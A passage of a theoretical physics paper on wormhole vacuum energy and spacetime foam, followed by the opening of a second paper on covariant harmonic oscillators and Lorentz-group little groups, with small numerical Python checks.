=\frac 1{l_p^2}\int_\Sigma d^3x\left( N{\cal H}+N_i{\cal H}^i\right)
\]
\begin{equation}
+\frac 2{l_p^2}\int_{S_{+}}^{}d^2x\sqrt{\sigma }\left( k-k^0\right) -\frac 2{%
l_p^2}\int_{S_{-}}d^2x\sqrt{\sigma }\left( k-k^0\right) ,
\end{equation}
where $l_p^2=16\pi G$. The volume term contains two constraints
\begin{equation}
\left\{
\begin{array}{l}
{\cal H}=G_{ijkl}\pi ^{ij}\pi ^{kl}\left( \frac{l_p^2}{\sqrt{g}}\right)
-\left( \frac{\sqrt{g}}{l_p^2}\right) R^{\left( 3\right) }=0 \\
{\cal H}^i=-2\pi _{|j}^{ij}=0
\end{array}
\right. , \label{a1a}
\end{equation}
where $G_{ijkl}=\frac 12\left( g_{ik}g_{jl}+g_{il}g_{jk}-g_{ij}g_{kl}\right)
$ and $R^{\left( 3\right) }$ denotes the scalar curvature of the surface $%
\Sigma $. By using the expression of the trace
\begin{equation}
k=-\frac 1{\sqrt{h}}\left( \sqrt{h}n^\mu \right) _{,\mu },
\end{equation}
with the normal to the boundaries defined continuously along $\Sigma $ as
$n^\mu =\left( h^{yy}\right) ^{\frac 12}\delta _y^\mu $, we find that the
value of $k$ depends on the function $r,_y$, where we have assumed that
$r,_y $ is positive for $S_{+}$ and negative for $S_{-}$. We obtain at either
boundary that
\begin{equation}
k=\frac{-2r,_y}r.
\end{equation}
The trace associated with the subtraction term is taken to be $k^0=-2/r$ for
$B_{+}$ and $k^0=2/r$ for $B_{-}$. Then the quasilocal energy with
subtraction terms included is
\begin{equation}
E_{{\rm quasilocal}}=E_{+}-E_{-}=\left( r\left[ 1-\left| r,_y\right| \right]
\right) _{y=y_{+}}-\left( r\left[ 1-\left| r,_y\right| \right] \right)
_{y=y_{-}}.
\end{equation}
Note that the total quasilocal energy is zero for boundary conditions
symmetric with respect to the bifurcation surface $S_0$, and this is the
necessary condition for obtaining an instability with respect to flat space. A
brief comment on the total Hamiltonian is useful before proceeding further. We are
looking at the sector of asymptotically flat metrics included in the space
of all metrics, where the Wheeler-DeWitt equation
\begin{equation}
{\cal H}\Psi =0
\end{equation}
is defined. In this sector the Schwarzschild metric and the Flat metric
satisfy the constraint equations $\left( \ref{a1a}\right) $. Here we
consider deviations from such metrics in a WKB approximation and we
calculate the expectation value following a variational approach where the
WKB functions are substituted with trial wave functionals. Then the
Hamiltonian referred to the line element $\left( \ref{a1}\right) $ is
\[
H=\int_\Sigma d^3x\left[ G_{ijkl}\pi ^{ij}\pi ^{kl}\left( \frac{l_p^2}{\sqrt{%
g}}\right) -\left( \frac{\sqrt{g}}{l_p^2}\right) R^{\left( 3\right) }\right]
.
\]
Instead of looking at perturbations on the whole manifold ${\cal M}$, we
consider perturbations on $\Sigma $ of the type $g_{ij}=\bar{g}_{ij}+h_{ij}$,
where $\bar{g}_{ij}$ is the spatial part of the background considered in
eq.$\left( \ref{a1}\right) $. In Ref.\cite{Remo1}, we have defined $\Delta E\left(
m\right) $ as the difference of the expectation value of the Hamiltonian
approximated to second order calculated with respect to different
backgrounds which have the asymptotic flatness property. This quantity is
the natural extension to the volume term of the subtraction procedure for
boundary terms and is interpreted as the Casimir energy related to vacuum
fluctuations. Thus
\[
\Delta E\left( m\right) =E\left( m\right) -E\left( 0\right)
\]
\begin{equation}
=\frac{\left\langle \Psi \left| H^{Schw.}-H^{Flat}\right| \Psi \right\rangle
}{\left\langle \Psi |\Psi \right\rangle }+\frac{\left\langle \Psi \left|
H_{quasilocal}\right| \Psi \right\rangle }{\left\langle \Psi |\Psi
\right\rangle }.
\end{equation}
By restricting our attention to the graviton sector of the Hamiltonian
approximated to second order, hereafter referred as $H_{|2}$, we define
\[
E_{|2}=\frac{\left\langle \Psi ^{\perp }\left| H_{|2}^1\right| \Psi ^{\perp
}\right\rangle }{\left\langle \Psi ^{\perp }|\Psi ^{\perp }\right\rangle },
\]
where
\[
\Psi ^{\perp }=\Psi \left[ h_{ij}^{\perp }\right] ={\cal N}\exp \left\{ -%
\frac 1{4l_p^2}\left[ \left\langle \left( g-\bar{g}\right) K^{-1}\left( g-%
\bar{g}\right) \right\rangle _{x,y}^{\perp }\right] \right\} .
\]
After having functionally integrated $H_{|2}$, we get
\begin{equation}
H_{|2}=\frac 1{4l_p^2}\int_\Sigma d^3x\sqrt{g}G^{ijkl}\left[ K^{-1\bot
}\left( x,x\right) _{ijkl}+\left( \triangle _2\right) _j^aK^{\bot }\left(
x,x\right) _{iakl}\right]
\end{equation}
The propagator $K^{\bot }\left( x,x\right) _{iakl}$ comes from a functional
integration and it can be represented as
\begin{equation}
K^{\bot }\left( \overrightarrow{x},\overrightarrow{y}\right) _{iakl}:=\sum_N%
\frac{h_{ia}^{\bot }\left( \overrightarrow{x}\right) h_{kl}^{\bot }\left(
\overrightarrow{y}\right) }{2\lambda _N\left( p\right) },
\end{equation}
where $h_{ia}^{\bot }\left( \overrightarrow{x}\right) $ are the
eigenfunctions of
\begin{equation}
\left( \triangle _2\right) _j^a:=-\triangle \delta _j^{a_{}^{}}+2R_j^a.
\end{equation}
This is the Lichnerowicz operator projected on $\Sigma $ acting on traceless
transverse quantum fluctuations and $\lambda _N\left( p\right) $ are
infinite variational parameters. $\triangle $ is the curved Laplacian
(Laplace-Beltrami operator) on a Schwarzschild background and $R_{j\text{ }%
}^a$ is the mixed Ricci tensor whose components are:
\begin{equation}
R_j^a=diag\left\{ \frac{-2m}{r_{}^3},\frac m{r_{}^3},\frac m{r_{}^3}\right\}
.
\end{equation}
After normalization in spin space and after a rescaling of the fields in
such a way as to absorb $l_p^2$, $E_{|2}$ becomes in momentum space
\begin{equation}
E_{|2}\left( m,\lambda \right) =\frac V{2\pi ^2}\sum_{l=0}^\infty
\sum_{i=1}^2\int_0^\infty dpp^2\left[ \lambda _i\left( p\right) +\frac{%
E_i^2\left( p,m,l\right) }{\lambda _i\left( p\right) }\right] , \label{a3}
\end{equation}
where
\begin{equation}
E_{1,2}^2\left( p,m,l\right) =p^2+\frac{l\left( l+1\right) }{r_0^2}\mp \frac{%
3m}{r_0^3}
\end{equation}
and $V$ is the volume of the system. $r_0$ is related to the minimum radius
compatible with the wormhole throat. We know that the classical minimum is
achieved when $r_0=2m$. However, it is likely that quantum processes come
into play at short distances, where the wormhole throat is defined,
introducing a {\it quantum} radius $r_0>2m$. The minimization with respect
to $\lambda $ leads to $\bar{\lambda}_i\left( p,l,m\right) =\sqrt{%
E_i^2\left( p,m,l\right) }$ and eq.$\left( \ref{a3}\right) $ becomes
\begin{equation}
E_{|2}\left( m,\lambda \right) =2\frac V{2\pi ^2}\sum_{l=0}^\infty
\sum_{i=1}^2\int_0^\infty dpp^2\sqrt{E_i^2\left( p,m,l\right) },
\end{equation}
with $p^2+\frac{l\left( l+1\right) }{r_0^2}>\frac{3m}{r_0^3}.$ Thus, in
the presence of the curved background, we get
\begin{equation}
E_{|2}\left( m\right) =\frac V{2\pi ^2}\frac 12\sum_{l=0}^\infty
\int_0^\infty dpp^2\left( \sqrt{p^2+c_{-}^2}+\sqrt{p^2+c_{+}^2}\right)
\end{equation}
where
\[
c_{\mp }^2=\frac{l\left( l+1\right) }{r_0^2}\mp \frac{3m}{r_0^3},
\]
while when we refer to the flat space, we have $m=0$ and $c^2=$ $\frac{%
l\left( l+1\right) }{r_0^2}$, with
\begin{equation}
E_{|2}\left( 0\right) =\frac V{2\pi ^2}\frac 12\sum_{l=0}^\infty
\int_0^\infty dpp^2\left( 2\sqrt{p^2+c^2}\right) .
\end{equation}
Since we are interested in the $UV$ limit, we will use a cut-off $\Lambda $
to keep the $UV$ divergence under control
\begin{equation}
\int_0^\infty \frac{dp}p\sim \int_0^{\frac \Lambda c}\frac{dx}x\sim \ln
\left( \frac \Lambda c\right) ,
\end{equation}
where $\Lambda \leq m_p.$ Note that in this context the introduction of a
cut-off at the Planck scale is quite natural if we look at a spacetime foam.
Thus $\Delta E\left( m\right) $ for high momenta becomes
\begin{equation}
\Delta E\left( m\right) \sim -\frac V{2\pi ^2}\left( \frac{3m}{r_0^3}\right)
^2\frac 1{16}\ln \left( \frac{r_0^3\Lambda ^2}{3m}\right) . \label{a4}
\end{equation}
We now extremize $\widetilde{\Delta E}\left( m\right) =E\left(
0\right) -E\left( m\right) =-\Delta E\left( m\right) $. We obtain two
stationary values for $m$: $m_1=0$, i.e. flat space, and
$m_2=\Lambda ^2e^{-\frac 12}r_0^3/3$, which minimizes
$\Delta E\left( m\right) $. At this point, $%
\widetilde{\Delta E}\left( m_2\right) =\frac V{64\pi ^2}\frac{\Lambda ^4}e$.
Recall that $m=MG$, thus
\begin{equation}
M=G^{-1}\Lambda ^2e^{-\frac 12}r_0^3/3.
\end{equation}
When $\Lambda \rightarrow m_p$, then $r_0\rightarrow l_p.$ This means that
a Heisenberg uncertainty relation of the type $l_pm_p=1$ (in natural units)
has to be satisfied; then
\begin{equation}
M=m_p^2e^{-\frac 12}m_p^{-1}/3=\frac{m_p}{3\sqrt{e}}.
\end{equation}
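The stationarity condition behind $m_2$ can be checked directly: setting
$d\widetilde{\Delta E}/dm=0$ in eq.$\left( \ref{a4}\right) $ gives
$\ln \left( r_0^3\Lambda ^2/3m\right) =1/2$, i.e. $m_2=\Lambda ^2e^{-1/2}r_0^3/3$.
A small numerical sketch (in units $V=r_0=\Lambda =1$, an illustrative choice;
a bisection on the numerical derivative locates the nontrivial stationary point)
reproduces both $m_2$ and the value $V\Lambda ^4/\left( 64\pi ^2e\right) $:

```python
import numpy as np

# Delta E tilde(m) = (V/2 pi^2) (3m/r0^3)^2 (1/16) ln(r0^3 Lambda^2/3m),
# in units V = r0 = Lambda = 1 (illustrative choice).
def dE(m):
    return (1.0/(2.0*np.pi**2)) * (3.0*m)**2 / 16.0 * np.log(1.0/(3.0*m))

# Central-difference derivative; its root is the nontrivial stationary point.
def ddE(m, h=1e-8):
    return (dE(m + h) - dE(m - h)) / (2.0*h)

# Bisection on a bracket where the derivative changes sign
a, b = 0.05, 0.33
for _ in range(200):
    c = 0.5*(a + b)
    if ddE(a)*ddE(c) <= 0.0:
        b = c
    else:
        a = c
m2 = 0.5*(a + b)

print(m2, np.exp(-0.5)/3.0)               # stationary point: m2 = e^(-1/2)/3
print(dE(m2), 1.0/(64.0*np.pi**2*np.e))   # value: Lambda^4 V/(64 pi^2 e)
```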
\section{N$_{w}$ wormholes approximation}
\label{p3}
Consider $N_{w}$ wormholes and assume that there exists a
covering of $\Sigma $ such that $\Sigma =\cup _{i=1}^{N_{w}}\Sigma _{i}$,
with $\Sigma _{i}\cap \Sigma _{j}=\emptyset $ when $i\neq j$. Each $\Sigma
_{i}$ has the topology $S^{2}\times R^{1}$ with boundaries $\partial \Sigma
_{i}^{\pm }$ with respect to each bifurcation surface. On each surface $%
\Sigma _{i}$, quasilocal energy gives
\begin{equation}
E_{i\text{ }{\rm quasilocal}}=\frac{2}{l_{p}^{2}}\int_{S_{i+}}d^{2}x\sqrt{%
\sigma }\left( k-k^{0}\right) -\frac{2}{l_{p}^{2}}\int_{S_{i-}}d^{2}x\sqrt{%
\sigma }\left( k-k^{0}\right) ,
\end{equation}
and by using the expression of the trace
\begin{equation}
k=-\frac{1}{\sqrt{h}}\left( \sqrt{h}n^{\mu }\right) _{,\mu },
\end{equation}
we obtain at either boundary that
\begin{equation}
k=\frac{-2r,_{y}}{r},
\end{equation}
where we have assumed that the function $r,_{y}$ is positive for $S_{i+}$
and negative for $S_{i-}$. The trace associated with the subtraction term is
taken to be $k^{0}=-2/r$ for $B_{i+}$ and $k^{0}=2/r$ for $B_{i-}$. Here the
quasilocal energy with subtraction terms included is
\begin{equation}
E_{i\text{ }{\rm quasilocal}}=E_{i+}-E_{i-}=\left( r\left[ 1-\left|
r,_{y}\right| \right] \right) _{y=y_{i+}}-\left( r\left[ 1-\left|
r,_{y}\right| \right] \right) _{y=y_{i-}}.
\end{equation}
Note that the total quasilocal energy is zero for boundary conditions
symmetric with respect to {\it each} bifurcation surface $S_{0,i}$. We are
interested in a large number of wormholes, each of them contributing a
Hamiltonian of the type $H_{|2}$. If the wormhole number is $N_{w}$, we
obtain (semiclassically, i.e., without self-interactions)
\begin{equation}
H_{tot}^{N_{w}}=\underbrace{H^{1}+H^{2}+\ldots +H^{N_{w}}}_{N_{w}\ {\rm times}}.
\end{equation}
Thus the total energy for the collection is
\[
E_{|2}^{tot}=N_{w}H_{|2}.
\]
The same happens for the trial wave functional, which is the product of $%
N_{w} $ single-wormhole trial wave functionals. Thus
\[
\Psi _{tot}^{\perp }=\Psi _{1}^{\perp }\otimes \Psi _{2}^{\perp }\otimes
\ldots \ldots \Psi _{N_{w}}^{\perp }={\cal N}\exp N_{w}\left\{ -\frac{1}{%
4l_{p}^{2}}\left[ \left\langle \left( g-\bar{g}\right) K^{-1}\left( g-\bar{g}%
\right) \right\rangle _{x,y}^{\perp }\right] \right\}
\]
\[
={\cal N}\exp \left\{ -\frac{1}{4}\left[ \left\langle \left( g-\bar{g}%
\right) K^{-1}\left( g-\bar{g}\right) \right\rangle _{x,y}^{\perp }\right]
\right\} ,
\]
where we have rescaled the fluctuations $h=g-\bar{g}$ in such a way as to
absorb $N_{w}/l_{p}^{2}.$ Of course, if we want the trial wave functionals
to be independent of one another, the boundaries $\partial \Sigma ^{\pm }$
have to shrink as the wormhole number $N_{w}$ grows;
otherwise overlapping terms could be produced. Thus, for $N_{w}$-wormholes,
we obtain
\[
H^{tot}=N_{w}H=\int_{\Sigma }d^{3}x\left[ G_{ijkl}\pi ^{ij}\pi ^{kl}\left(
N_{w}\frac{l_{p}^{2}}{\sqrt{g}}\right) -\left( N_{w}\frac{\sqrt{g}}{l_{p}^{2}%
}\right) R^{\left( 3\right) }\right]
\]
\[
=\int_{\Sigma }d^{3}x\left[ G_{ijkl}\pi ^{ij}\pi ^{kl}\left( \frac{%
l_{N_{w}}^{2}}{\sqrt{g}}\right) -\left( N_{w}^{2}\frac{\sqrt{g}}{%
l_{N_{w}}^{2}}\right) R^{\left( 3\right) }\right] ,
\]
where we have defined $l_{N_{w}}^{2}=l_{p}^{2}N_{w}$ with $l_{N_{w}}^{2}$
fixed and $N_{w}\rightarrow \infty .$ Thus, repeating the same steps of
section \ref{p2} for $N_{w}$ wormholes, we obtain
\begin{equation}
\Delta E_{N_{w}}\left( m\right) \sim -N_{w}^{2}\frac{V}{2\pi ^{2}}\left(
\frac{3m}{r_{0}^{3}}\right) ^{2}\frac{1}{16}\ln \left( \frac{%
r_{0}^{3}\Lambda ^{2}}{3m}\right) .
\end{equation}
Then at one loop the cooperative effects of wormholes behave as a single
{\it macroscopic }field multiplied by $N_{w}^{2}$; this is the consequence
of the coherency assumption. We have explored the consequences of this
result in Ref.\cite{Remo1}. Indeed, coming back to the single-wormhole
contribution, we have seen that the black hole pair creation probability
mediated by a wormhole is energetically favored with respect to the
permanence of flat space, provided the boundary conditions are
symmetric with respect to the bifurcation surface, which is the throat of the
wormhole. In this approximation boundary terms give zero contribution and
the volume term is nonvanishing. As in the one-wormhole case, we now
extremize $\widetilde{\Delta E}_{N_{w}}\left( m\right) =\left( E\left(
0\right) -E\left( m\right) \right) _{N_{w}}=-\Delta E_{N_{w}}\left( m\right)
$. The nontrivial stationary point is reached for $\bar{m}=\Lambda ^{2}e^{-\frac{1}{2}%
}r_{0}^{3}/3$, where
\begin{equation}
\widetilde{\Delta E}\left( \bar{m}\right) =N_{w}^{2}\frac{V}{64\pi ^{2}}%
\frac{\Lambda ^{4}}{e}.
\end{equation}
The main difference from the one-wormhole case is that we have $N_{w}$
wormholes contributing the same amount of energy. Since $%
m=MN_{w}G=Ml_{N_{w}}^{2}$, we have
\begin{equation}
M=\left( l_{N_{w}}^{2}/N_{w}\right) ^{-1}\Lambda ^{2}e^{-\frac{1}{2}%
}r_{0}^{3}/3.
\end{equation}
When $\Lambda \rightarrow m_{p}$, then $r_{0}\rightarrow l_{p}$ and $%
l_{p}m_{p}=1$. Thus
\begin{equation}
M=\frac{\left( l_{N_{w}}^{2}/N_{w}\right) ^{-1}m_{p}^{-1}}{3\sqrt{e}}=N_{w}%
\frac{m_{N_{w}}}{3\sqrt{e}}
\end{equation}
So far, we have discussed the stable-mode contribution. However, we have
discovered that for one wormhole unstable modes also contribute to the total
energy\cite{GPY,Remo1}. Since we are interested in a large number of
wormholes, the first question to answer is what happens to the boundaries
as the wormhole number grows. In the one-wormhole case, the
existence of one negative mode is guaranteed by the vanishing of the
eigenfunction of the operator $\Delta _{2}$ at infinity, which is the same
space-like infinity of the quasilocal energy, i.e. we have the $ADM$
positive mass $M$ in a coordinate system of the universe where the observer
is present and the anti-$ADM$ mass in a coordinate system where the observer
is not there. When the number of wormholes grows, to keep the coherency
assumption valid, the space available for every single wormhole has to be
reduced to avoid overlapping of the wave functions. This means that boundary
conditions are not fixed at infinity, but at a certain finite radius and the
$ADM$ mass term is substituted by the quasilocal energy expression under the
condition of having symmetry with respect to each bifurcation surface. As $%
N_{w}$ grows, the boundary radius $\bar{r}$ reduces more and more and the
unstable mode disappears. This means that there exists a certain radius $%
r_{c}$ below which no negative mode appears, and a
given value $N_{w_{c}}$ above which the same effect is produced. In
rigorous terms: $\forall N\geq N_{w_{c}}\ \exists $ $r_{c}$ $s.t.$ $\forall
\ r_{0}\leq r\leq r_{c},\ \sigma \left( \Delta _{2}\right) =\emptyset $.
This means that the system begins to be stable. In support of this idea, we
invoke the results of Ref.~\cite{B.Allen}, where it is explicitly
shown that restricting the spatial boundaries leads to a stabilization of
the system. Thus at the minimum, we obtain the typical energy density
behavior of the foam
\begin{equation}
\frac{\Delta E}{V}\sim -N_{w}^{2}\Lambda ^{4}
\end{equation}
\section{Conclusions and Outlooks}
\label{p4}
According to Wheeler's ideas about quantum fluctuations of the metric at the
Planck scale, we have used a simple model made of a large collection of
wormholes to investigate the vacuum energy contribution needed for the
formation of a foamy spacetime. This investigation has been carried out in a
semiclassical approximation where the wormholes are treated independently
of one another (coherency hypothesis). The starting point is the single
wormhole, whose energy contribution has the typical trend of the
gravitational field energy fluctuation. The wormhole considered is of the
Schwarzschild type and every energy computation has to be done having in
mind the reference space, i.e. flat space. When we examine the wormhole
collection, we find the same energy trend as in the single case. This is
obviously the result of the coherency assumption. However, the single
wormhole cannot be taken as a model for a spacetime foam, because it
exhibits one negative mode. This negative mode is the key to the topology
change from a space without holes (flat space) to a space with a hole
inside (Schwarzschild space). However, things are different when we consider
a large number of wormholes $N_w$. Let us see what is going on: the
classical vacuum, represented by flat space, is stable under nucleation of a
single black hole, while it is unstable under neutral pair creation with
the components residing in different universes divided by a wormhole. Once
the topology change has been primed by means of a single wormhole, there will be
a considerable production of pairs, each mediated by its own wormhole. The
result is that the hole production will persist until the critical value $%
N_{w_c}$ is reached and spacetime enters the stable phase. If we
look at this scenario a little closer, we can see that it has the properties
of the Wheeler foam. Nevertheless, we have to explain why observations
measure a flat space structure. For this purpose, we recall that the
foamy spacetime structure should be visible only at the Planck scale, while
at greater scales it is likely that the flat structure could be recovered by
means of averages over the collective functional describing the {\it %
semiclassical} foam. Indeed if $\eta _{ij}$ is the spatial part of the flat
metric, ordinarily we should obtain
\begin{equation}
\left\langle \Psi \left| g_{ij}\right| \Psi \right\rangle =\eta _{ij},
\end{equation}
where $g_{ij}$ is the spatial part of the gravitational field. However in
the foamy representation we should consider, instead of the previous
expectation value, the expectation value of the gravitational field
calculated on wave functional representing the foam, i.e., to see that at
large distances flat space is recovered we should obtain
\begin{equation}
\left\langle \Psi _{foam}\left| g_{ij}\right| \Psi _{foam}\right\rangle
=\eta _{ij},
\end{equation}
where $\Psi _{foam}$ is a superposition of the single-wormhole wave
functional
\begin{equation}
\Psi _{foam}=\sum_{i=1}^{N_w}\Psi _i^{\perp }.
\end{equation}
This has to be attributed to the semiclassical approximation, which renders
the system non-interacting. However, things can change when we
will consider higher order corrections and the other terms of the action
decomposition, i.e. the spin one and spin zero terms. Nevertheless, we can
argue that only spin zero terms (associated with the conformal factor) will
be relevant, even if the part of the action which carries the physical
quantities is that discussed in this text, i.e., the spin two part of the
action related to the gravitons.
\section{Acknowledgments}
I wish to thank R. Brout, M. Cavagli\`{a}, C. Kiefer, D. Hochberg, G.
Immirzi, S. Liberati, P. Spindel and M. Visser for useful comments and
discussions.
| 2024-02-18T23:40:12.713Z | 1998-11-26T19:56:39.000Z | algebraic_stack_train_0000 | 1,666 | 4,013 |
|
proofpile-arXiv_065-8203 | \section{Introduction}\label{intro}
Harmonic oscillators played the essential role in the development of
quantum mechanics. From the mathematical point of view, the present
form of quantum mechanics did not advance too far from the oscillator
framework. Thus, the first relativistic wave function has to be the
oscillator wave function. With this point in mind, Dirac in 1945 wrote
down a normalizable four-dimensional wave function and attempted to
construct representations of the Lorentz group~\cite{dir45}, and
started a history of the oscillators which can be
Lorentz-boosted~\cite{yuka53,knp86}.
Let us consider the Minkowskian space consisting of the
three-dimensional space of $(x, y, z)$ and one time variable $t$.
Then the quantity $\left(x^{2} + y^{2} + z^{2} - t^{2}\right)$
remains invariant under Lorentz transformations. On the other hand,
$\left(x^{2} + y^{2} + z^{2} + t^{2}\right)$ is not invariant.
Thus, the exponential form
\begin{equation}\label{ex1}
\exp\left(x^{2} + y^{2} + z^{2} - t^{2}\right)
\end{equation}
is a Lorentz-invariant quantity, while the form
\begin{equation}\label{ex2}
\exp\left(x^{2} + y^{2} + z^{2} + t^{2}\right)
\end{equation}
is not. The Gaussian function of Eq.(\ref{ex2}) is localized in the
$t$ variable. It was Dirac who wrote down this normalizable Gaussian
form in 1945~\cite{dir45}. In 1963, the author of this report was
fortunate enough to hear directly from Prof. Dirac that the physics of
special relativity is much richer than writing down Lorentz-invariant
quantities. This could mean that we should study more systematically
the above normalizable form under the influence of Lorentz boosts,
and this study has led to the observation that Lorentz boosts are
squeeze transformations~\cite{kn73,knp91}.
The exponential form of Eq.(\ref{ex1}) is Lorentz-invariant but cannot
be normalized. This aspect was noted by Feynman {\it et al}. in their
1971 paper~\cite{fkr71}. In their paper, Feynman {\it et al}. tell us
not to use Feynman diagrams but to use oscillator wave functions when
we approach relativistic bound states. In this report, we shall use
much of the formalism given in Ref.~\cite{fkr71}, but not their
Lorentz-invariant wave functions which are not normalizable.
In this report, we discuss the oscillator representations of the
$O(3,1)$ and explain why this representation is adequate for internal
space-time symmetry of relativistic extended hadrons. This group
has $O(1,1)$ as a subgroup which describes Lorentz boosts along a
given direction. It is shown that Lorentz boosts are squeeze
transformations. It is shown also that the infinite-dimensional
unitary representation of this squeeze group constitutes the
mathematical basis for squeezed states of light.
In Sec.~\ref{subg}, we discuss the three-parameter subgroups of the
six-parameter Lorentz group which leaves the four-momentum of the
particle invariant. These groups govern the internal space-time
symmetries of relativistic particles, and they are called Wigner's
little groups~\cite{wig39}.
In Sec.~\ref{covham}, it is shown that the covariant harmonic
oscillators constitute a representation of the Poincar\'e group for
relativistic extended particles. If we add Lorentz boosts to
the oscillator formalism, the symmetry group becomes non-compact, and
its unitary representations become infinite-dimensional.
In Sec.~\ref{infinite}, we study an infinite-dimensional unitary
representation for the harmonic oscillator formalism.
\section{Subgroups of the Lorentz Group}\label{subg}
The Poincar\'e group is the group of inhomogeneous Lorentz
transformations, namely Lorentz transformations followed by space-time
translations. This group is known as the fundamental space-time
symmetry group for relativistic particles. This ten-parameter group
has many different representations. For space-time symmetries, we study
first Wigner's little groups. The little group is a maximal subgroup
of the six-parameter Lorentz group whose transformations leave the
four-momentum of a given particle invariant. The little group therefore
governs the internal space-time symmetry of the particles. Massive
particles in general have spin degrees of freedom. Massless
particles in general have the helicity and gauge degrees of freedom.
Let $J_{i}$ be the three generators of the rotation group and $K_{i}$
be the three boost generators. They then satisfy the commutation
relations
\begin{equation}
\left[J_{i}, J_{j}\right] = i \epsilon_{ijk} J_{k} , \qquad
\left[J_{i}, K_{j}\right] = i \epsilon_{ijk} K_{k} , \qquad
\left[K_{i}, K_{j}\right] = - i \epsilon_{ijk} J_{k} .
\end{equation}
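These commutation relations can be verified directly in the $4\times 4$ vector
representation. The sketch below (conventions: coordinate order $(x,y,z,t)$,
$\left( J_k\right) _{mn}=-i\epsilon _{kmn}$ on the spatial block, and $K_k$ a
symmetric mixing of the $k$-th axis with $t$; these explicit matrices are an
illustrative choice) checks one representative relation from each set:

```python
import numpy as np

# Levi-Civita symbol
eps = np.zeros((3, 3, 3))
for i, j, k in [(0, 1, 2), (1, 2, 0), (2, 0, 1)]:
    eps[i, j, k], eps[i, k, j] = 1.0, -1.0

# Rotation generators: (J_k)_{mn} = -i eps_{kmn} on the spatial 3x3 block
J = []
for k in range(3):
    M = np.zeros((4, 4), dtype=complex)
    M[:3, :3] = -1j*eps[k]
    J.append(M)

# Boost generators: K_k mixes the k-th spatial coordinate with time
K = []
for k in range(3):
    M = np.zeros((4, 4), dtype=complex)
    M[k, 3] = M[3, k] = 1j
    K.append(M)

def comm(A, B):
    return A @ B - B @ A

# [J1,J2] = i J3, [J1,K2] = i K3, [K1,K2] = -i J3
print(np.allclose(comm(J[0], J[1]),  1j*J[2]))   # True
print(np.allclose(comm(J[0], K[1]),  1j*K[2]))   # True
print(np.allclose(comm(K[0], K[1]), -1j*J[2]))   # True
```

The last relation, with its minus sign, is what makes the Lorentz group non-compact.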
The three-dimensional rotation group is a subgroup of the Lorentz group.
If a particle is at rest, we can rotate it without changing the
four-momentum. Thus, the little group for massive particles is
the three-parameter rotation group. If the particle is boosted, it
gains a momentum along the boosted direction. If it is boosted along
the $z$ direction, the boost operator becomes
\begin{equation}
B_{3}(\eta) = \exp\left(-i\eta K_{3}\right) .
\end{equation}
The little group is then generated by
\begin{equation}
J'_{i} = B_{3}(\eta) J_{i} \left(B_{3}(\eta)\right)^{-1} .
\end{equation}
These boosted $O(3)$ generators satisfy the same set of commutation
relations as the set for $O(3)$.
\vspace{5mm}
\begin{quote}
Table I. Covariance of the energy-momentum relation, and covariance of
the internal space-time symmetry groups. The quark model and the parton
model are two different manifestations of the same covariant entity.
\end{quote}
\begin{center}
\begin{tabular}{ccc}
Massive, Slow & COVARIANCE & Massless, Fast \\[2mm]\hline
{}&{}&{}\\
$E = p^{2}/2m$ & Einstein's $E = mc^{2}$ & $E = cp$ \\[4mm]\hline
{}&{}&{} \\
$S_{3}$ & {} & $S_{3}$ \\ [-1mm]
{} & Wigner's Little Group & {} \\[-1mm]
$S_{1}, S_{2}$ & {} & Gauge Trans. \\[4mm]\hline
{}&{}&{} \\
{}&{}&{} \\ [-2mm]
Quarks & Covariant Harmonic Oscillators & Partons \\[8mm]\hline
\end{tabular}
\end{center}
\vspace{5mm}
If the parameter $\eta$ becomes infinite, the particle becomes like
a massless particle. If we go through the contraction procedure
spelled out by Inonu and Wigner in 1953~\cite{inonu53}, the $O(3)$-like
little group becomes contracted to the $E(2)$-like little group for
massless particles generated by $J_{3}, N_{1}$, and
$N_{2}$~\cite{bacryc68,hks83pl}, where
\begin{equation}
N_{1} = K_{1} - J_{2} , \qquad N_{2} = K_{2} + J_{1} .
\end{equation}
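One can check directly that $N_1$ and $N_2$ commute with each other and close,
together with $J_3$, on an $E(2)$-like algebra: $[N_1,N_2]=0$, $[J_3,N_1]=iN_2$,
$[J_3,N_2]=-iN_1$. A self-contained sketch in the $4\times 4$ vector
representation (coordinate order $(x,y,z,t)$; the explicit matrices are an
illustrative choice) verifies this:

```python
import numpy as np

# Build a 4x4 generator from a dict of nonzero entries
def mat(entries):
    M = np.zeros((4, 4), dtype=complex)
    for (i, j), v in entries.items():
        M[i, j] = v
    return M

# Rotations (J_k)_{mn} = -i eps_{kmn} and boosts in the (x, y, z, t) convention
J1 = mat({(1, 2): -1j, (2, 1): 1j})
J2 = mat({(2, 0): -1j, (0, 2): 1j})
J3 = mat({(0, 1): -1j, (1, 0): 1j})
K1 = mat({(0, 3): 1j, (3, 0): 1j})
K2 = mat({(1, 3): 1j, (3, 1): 1j})

N1 = K1 - J2
N2 = K2 + J1

def comm(A, B):
    return A @ B - B @ A

# E(2)-like little-group algebra of the massless case
print(np.allclose(comm(N1, N2), 0))         # True: N1, N2 commute (translation-like)
print(np.allclose(comm(J3, N1),  1j*N2))    # True
print(np.allclose(comm(J3, N2), -1j*N1))    # True
```

$N_1$ and $N_2$ thus play the role of the two translations of the Euclidean
group, with $J_3$ as the rotation.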
These $N$ generators are known to generate gauge transformations for
massless particles~\cite{janner71,hks82}.
Gauge transformations for spin-1 photons are
well known. As for massless spin-1/2 particles, neutrino polarizations
are due to gauge invariance.
The transition from massive to massless particles is illustrated
in the second row of Table I. In Sec. \ref{covham}, we shall
discuss how a massive particle with space-time extension can be boosted
from its rest frame to an infinite-momentum frame. This aspect is
illustrated in the third row of Table I.
\section{Covariant Harmonic Oscillators}\label{covham}
If we construct a representation of the Lorentz group using normalizable
harmonic oscillator wave functions, the result is the covariant harmonic
oscillator formalism~\cite{knp86}. The formalism constitutes a
representation of Wigner's O(3)-like little group for a massive particle
with internal space-time structure. This oscillator formalism has been
shown to be effective in explaining the basic phenomenological features
of relativistic extended hadrons observed in high-energy laboratories.
In particular, the formalism shows that the quark model and Feynman's
parton picture~\cite{fey69} are two different manifestations of one
relativistic entity \cite{knp86,kim89}.
The essential feature of the covariant harmonic oscillator formalism is
that Lorentz boosts are squeeze transformations~\cite{kn73}. In the
light-cone coordinate system, the boost transformation expands one
coordinate while contracting the other so as to preserve the product of
these two coordinate remains constant. We shall show that the parton
picture emerges from this squeeze effect.
The covariant harmonic oscillator formalism has been discussed exhaustively
in the literature, and it is not necessary to give another full-fledged
treatment in the present paper. We shall discuss here one of the most
puzzling problems in high-energy physics, namely whether quarks are partons.
It is now a well-accepted view that hadrons are bound states of quarks.
This view is correct if the hadron is at rest or nearly at rest. On the
